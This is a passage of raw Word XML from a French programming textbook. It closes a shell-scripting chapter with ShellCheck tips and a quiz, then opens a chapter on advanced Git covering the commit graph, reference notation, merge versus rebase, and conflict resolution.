        <w:t># - uses: ludeeus/action-shellcheck@master</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SC2086</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (guillemets manquants) et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SC2181</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (test de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) sont les deux avertissements les plus fréquents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Corriger les avertissements au fur et à mesure évite qu'ils s'accumulent et deviennent impossibles à traiter.</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set -u</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Affiche les commandes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Échoue sur variable non définie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Ignore les erreurs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Active le mode verbeux</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Pourquoi citer les variables entre guillemets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Pour la lisibilité</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Pour préserver les espaces et les caractères spéciaux</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Pour accélérer</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Ce n'est pas nécessaire</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Quelle boucle lit un fichier ligne par ligne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for x in $(cat f)</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while IFS= read -r ligne</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for x in f</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until read f</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 xml:space="preserve">À quoi sert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>trap</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À intercepter les erreurs de syntaxe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À exécuter du code à la sortie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À créer une boucle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À paralléliser</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Quand préférer Python au shell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 xml:space="preserve">Pour lancer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>rsync</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Pour manipuler du JSON et des structures complexes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Pour copier des fichiers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Pour un alias</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Une variable non définie provoque une erreur au lieu d'être vide.</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Sans guillemets, le shell découpe la valeur sur les espaces.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IFS=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> préservent les espaces et les antislashs.</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Il associe une action à un signal ou à la fin du script.</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Le shell est une colle entre outils, pas un langage de structures de données.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>50. Git avancé : branches, rebasage et récupération</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Comprendre le graphe plutôt que mémoriser des commandes, et savoir réparer une erreur coûteuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 49</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Lire un graphe de commits et interpréter les références.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Choisir entre fusion et rebasage.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Réécrire un historique local sans risque.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Récupérer un commit perdu.</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Résoudre un conflit méthodiquement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>50.1 Le graphe avant les commandes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Git ne stocke pas des différences, mais des instantanés reliés par des parentés. Une branche n'est qu'une étiquette mobile sur un commit ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HEAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indique l'étiquette courante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2984500"/>
            <wp:docPr id="60" name="Picture 60"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f58.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId90"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2984500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.58 — Un dépôt, ses références</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six lectures du graphe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Lire l'historique comme un graphe</w:t>
        <w:br/>
        <w:t>git log --oneline --graph --decorate --all</w:t>
        <w:br/>
        <w:t>git log --oneline main..feature        # commits de feature absents de main</w:t>
        <w:br/>
        <w:t>git log --oneline feature..main        # l'inverse</w:t>
        <w:br/>
        <w:t>git log --oneline --no-merges --since="2 weeks ago"</w:t>
        <w:br/>
        <w:t>git show --stat HEAD</w:t>
        <w:br/>
        <w:t>git blame -L 20,40 fichier.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.171 — Six façons de désigner un commit</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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="345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Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3455"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HEAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5559"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Commit courant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="345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HEAD~1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Premier parent du commit courant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3455"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HEAD^2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5559"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Deuxième parent (commit de fusion)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="345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main@{yesterday}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Position de la branche hier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3455"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@{u}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5559"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Branche de suivi distante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="345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abc123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Commit par empreinte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RÉFÉRENCE DÉTACHÉE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">État où </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HEAD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pointe directement sur un commit au lieu d'une branche. Les commits créés dans cet état ne sont accessibles par aucune branche et peuvent être perdus.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>50.2 Fusion ou rebasage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les deux intègrent une branche, avec des conséquences opposées sur l'historique. Le choix dépend de ce que l'historique doit raconter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux stratégies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Fusion : préserve l'historique réel, crée un commit de fusion</w:t>
        <w:br/>
        <w:t>git switch main</w:t>
        <w:br/>
        <w:t>git merge --no-ff feature/menu</w:t>
        <w:br/>
        <w:br/>
        <w:t># Rebasage : rejoue les commits sur une nouvelle base</w:t>
        <w:br/>
        <w:t>git switch feature/menu</w:t>
        <w:br/>
        <w:t>git rebase main</w:t>
        <w:br/>
        <w:br/>
        <w:t># Rebasage interactif : nettoyer avant de proposer</w:t>
        <w:br/>
        <w:t>git rebase -i main</w:t>
        <w:br/>
        <w:t># pick   a1b2c3 Ajoute le bouton</w:t>
        <w:br/>
        <w:t># squash 4d5e6f Corrige la typo</w:t>
        <w:br/>
        <w:t># reword 7a8b9c Message à reformuler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.172 — Cinq critères de choix</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Critère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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Fusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="285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Rebasage</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Historique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fidèle, avec bifurcations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2854"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Linéaire, réécrit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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Ne réécrit rien</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="285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Réécrit les commits</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Branche partagée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Recommandé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2854"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À éviter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Branche locale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="285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Recommandé</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Résolution de conflit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une fois</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2854"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À chaque commit rejoué</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NE REBASEZ JAMAIS UNE BRANCHE PUBLIQUE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Réécrire des commits déjà poussés et utilisés par d'autres crée des divergences que chacun devra résoudre à la main. La règle simple : rebaser son travail local, fusionner le travail partagé.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un aller-retour toujours possible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Rebasage avec filet de sécurité</w:t>
        <w:br/>
        <w:t>git branch sauvegarde-avant-rebase</w:t>
        <w:br/>
        <w:t>git rebase main</w:t>
        <w:br/>
        <w:br/>
        <w:t># Si le résultat ne convient pas</w:t>
        <w:br/>
        <w:t>git rebase --abort</w:t>
        <w:br/>
        <w:t>git reset --hard sauvegarde-avant-rebase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>50.3 Résoudre un conflit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un conflit n'est pas une erreur : Git signale qu'il ne peut pas décider seul. La résolution consiste à produire l'état voulu, puis à l'enregistrer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une résolution méthodique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git merge feature/menu</w:t>
        <w:br/>
        <w:t># CONFLICT (content): Merge conflict in src/menu.js</w:t>
        <w:br/>
        <w:br/>
        <w:t># Le fichier contient :</w:t>
        <w:br/>
        <w:t># &lt;&lt;&lt;&lt;&lt;&lt;&lt; HEAD</w:t>
        <w:br/>
        <w:t># const ouvrir = () =&gt; panneau.classList.add("ouvert");</w:t>
        <w:br/>
        <w:t># =======</w:t>
        <w:br/>
        <w:t># const ouvrir = () =&gt; panneau.hidden = false;</w:t>
        <w:br/>
        <w:t># &gt;&gt;&gt;&gt;&gt;&gt;&gt; feature/menu</w:t>
        <w:br/>
        <w:br/>
        <w:t># 1. Comprendre les deux intentions</w:t>
        <w:br/>
